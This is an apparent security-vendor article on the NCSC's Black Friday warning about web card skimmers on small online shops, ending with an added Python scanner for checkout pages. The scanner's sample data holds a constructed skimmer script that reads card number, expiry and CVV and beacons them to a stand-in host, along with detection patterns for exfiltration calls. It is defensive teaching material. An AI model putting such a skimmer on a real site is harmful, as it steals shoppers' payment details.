The UK's top cybercops are urging owners of small online shops to "protect their customers and profits" by guarding against card skimmers in the frenetic shopping period that starts with Black Friday, which lands on November 26 this year.
The warning comes from the National Cyber Security Centre (NCSC), part of GCHQ, the UK's equivalent of the NSA, which says it identified 4,151 compromised online shops up to the end of September.
Card skimmers, also known as web skimmers, are bits of malicious software, typically JavaScript, that are injected into legitimate websites so they can steal shoppers' credit card details. Because the code runs in the shopper's browser, the shop's own server sees nothing unusual: the skimmer reads the details as users type them into the site's payment form, or replaces the payment form with a convincing fake, and sends the data to a server the criminals control.
The longer that cybercriminals can keep their card skimmers on a website before its customers or owners notice, the more money they will make, so they take care to be as unobtrusive as possible. Unsurprisingly, Malwarebytes' own research has shown that card skimming activity tends to ramp up on the busiest shopping days, when the most money changes hands. And some of the biggest shopping days of the year are nearly upon us, starting with Black Friday, the biggest of them all.
For the uninitiated, Black Friday is the annual celebration of peak capitalism that commemorates the symbolic moment that retailers go "into the black" for the year and start to make a profit. If you're wondering why shoppers would be so keen to celebrate the mechanics of retail accountancy, it's because shops mark the occasion (the Friday that follows Thanksgiving in the US) with extravagant sales, offers, and deals.
The NCSC is rightly concerned that with record amounts of money expected to slosh about on the Internet in the next few days, cybercriminals will be hard at work, spoiling everyone's fun.
It is worth noting that the NCSC's announcement uses the word "small" no fewer than four times ("small online shops"; "small business sites"; "small online retailers"; "small and medium-sized online retailers") in a short announcement that also mentions "SMEs" twice, and says it is written for "small & medium sized organisations".
On the off-chance the point still hasn't landed, let me spell it out for you: The NCSC would like you to know that no online business is small enough to ignore the threat of card skimmers.
I will add a personal note to that too. If you assume you are too small to be attacked by a card skimmer and your customers later find out their card details were stolen while on your site, they will expect you to have cared a great deal more. At least that's how I felt when it happened to me.
Not just Magento
Although its guidance is aimed at all e-commerce retailers, the NCSC makes specific mention of sites built on the Magento platform, which it says has been particularly popular with cybercriminals lately:
The majority of the online shops used for skimming identified by the NCSC had been compromised via a known vulnerability in Magento, a popular e-commerce platform.
However, your takeaway after reading that should not be "Magento" so much as "known vulnerability". Cybercriminals do not care that you're running Magento; they care only that you are running a system they can exploit because it contains a known vulnerability, and any system with a known vulnerability will do, thanks. It so happens that Magento has been a prime target recently, but every widely used e-commerce platform has had known vulnerabilities, and will have more. Not using Magento is no protection whatsoever.
What really matters is whether or not ecommerce sites are patched promptly when fixes for vulnerabilities are made available. Which is why the NCSC's headline guidance is "Retailers are urged to ensure that Magento—and any other software they use—is up to date".
Keeping website software up to date will certainly take you a very long way indeed in terms of protecting against card skimmers, but there is more to it than that.
For the "more to it than that", the NCSC points readers to the British Retail Consortium's Cyber Resilience Toolkit for Retail, and to its own website, which is full of useful cybersecurity advice, although neither resource is specifically about card skimming.
I would like to humbly suggest that readers should also consult our own guidance on how to defend your website against card skimmers. Our easy-to-digest advice is aimed at preventing card skimming specifically and explains how card skimming gangs find victims; why everyone is a potential target; how to avoid a website breach; how to protect your customers from a card skimmer if you are breached; and how to detect card skimmers as quickly as possible.
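To make the two points above concrete (how a skimmer hides inside an otherwise legitimate checkout page, and why detecting one quickly matters), here is an added example of a small checkout-page scanner. It is not part of the original article, Malwarebytes' guidance, or the NCSC's advice. It assumes a shop served from the hypothetical host shop.example whose only permitted third-party script comes from js.payments.example; both hosts, the sample HTML, and the injected skimmer snippet are constructed for the demonstration. The scanner flags scripts loaded from unexpected hosts, inline scripts that read card fields and also beacon data out or obfuscate themselves, and any inline script whose hash is not in a previously recorded known-good baseline.

```python
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumptions for this example: the shop is served from PAGE_HOST and the only
# third party allowed to load script on the checkout page is its payment provider.
PAGE_HOST = "shop.example"
ALLOWED_SCRIPT_HOSTS = {PAGE_HOST, "js.payments.example"}

# Heuristics, not a signature set: a script that reads card fields AND ships data
# somewhere (or hides what it is doing) deserves a human look.
CARD_FIELD_RE = re.compile(r"card[-_ ]?number|cc[-_]?num|cvv|cvc|expir", re.I)
EXFIL_RE = re.compile(r"new Image\(|\.src\s*=|fetch\(|XMLHttpRequest|sendBeacon|WebSocket", re.I)
OBFUSCATION_RE = re.compile(r"atob\(|btoa\(|fromCharCode|unescape\(|\\x[0-9a-f]{2}", re.I)


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._buf = None  # list while inside an inline <script>, else None

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf).strip())
            self._buf = None


def collect_scripts(html):
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.external, parser.inline


def script_hashes(html):
    """SHA-256 of every inline script on a known-good page; store as the baseline."""
    _, inline = collect_scripts(html)
    return {hashlib.sha256(body.encode()).hexdigest() for body in inline}


def scan_checkout_page(html, baseline=None):
    """Return findings as dicts with 'kind' and 'detail'; an empty list means clean."""
    findings = []
    external, inline = collect_scripts(html)
    for src in external:
        host = urlparse(src).hostname or PAGE_HOST  # relative URL = first party
        if host not in ALLOWED_SCRIPT_HOSTS:
            findings.append({"kind": "unexpected_script_host", "detail": src})
    for body in inline:
        touches_cards = bool(CARD_FIELD_RE.search(body))
        exfiltrates = bool(EXFIL_RE.search(body))
        obfuscated = bool(OBFUSCATION_RE.search(body))
        if touches_cards and (exfiltrates or obfuscated):
            findings.append({"kind": "suspicious_inline_script", "detail": body[:80]})
        if baseline is not None and hashlib.sha256(body.encode()).hexdigest() not in baseline:
            findings.append({"kind": "inline_script_not_in_baseline", "detail": body[:80]})
    return findings


# Constructed sample: a clean checkout page for the hypothetical shop.
CLEAN_CHECKOUT_HTML = """<html><body>
<script src="/static/checkout.js"></script>
<script src="https://js.payments.example/v1/sdk.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<form id="pay"><input name="cardnumber"><input name="expiry"><input name="cvv"><button>Pay</button></form>
</body></html>"""

# The same page after a constructed skimmer injection: one extra third-party script
# plus an inline submit handler that reads the card fields and beacons them out.
SKIMMED_CHECKOUT_HTML = CLEAN_CHECKOUT_HTML.replace(
    "</form>",
    "</form>\n<script src=\"//cdn-stats.example/analytics.js\"></script>\n"
    "<script>document.getElementById('pay').addEventListener('submit',function(){"
    "var f=this;var d=btoa(f.cardnumber.value+'|'+f.expiry.value+'|'+f.cvv.value);"
    "(new Image()).src='https://cdn-stats.example/i.gif?d='+d;});</script>",
)

if __name__ == "__main__":
    baseline = script_hashes(CLEAN_CHECKOUT_HTML)
    for finding in scan_checkout_page(SKIMMED_CHECKOUT_HTML, baseline):
        print(finding["kind"], "->", finding["detail"])
```

Run it against the page as a shopper would see it (fetched through a browser or a headless one, not read from the server's own files, because a skimmer injected at a CDN, a tag manager, or a compromised third-party script never appears on disk). The baseline check is the part that catches skimmers the heuristics miss: record the hashes after each legitimate deploy, and treat any inline script that does not match as a change you did not make until proven otherwise.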